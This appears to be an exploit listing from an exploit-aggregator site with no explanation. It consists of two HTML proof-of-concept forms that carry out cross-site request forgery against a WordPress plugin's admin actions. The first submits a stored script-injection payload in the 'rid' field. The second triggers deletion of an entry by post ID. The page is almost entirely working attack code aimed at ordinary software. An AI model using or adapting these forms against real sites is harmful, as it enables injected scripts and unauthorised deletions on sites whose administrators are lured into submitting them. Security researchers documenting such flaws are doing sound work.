Share
## https://sploitus.com/exploit?id=WPEX-ID:7548C1FB-77B5-4290-A297-35820EDFE0F8
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
<input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
<input type="hidden" name="postID" value="<RID>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>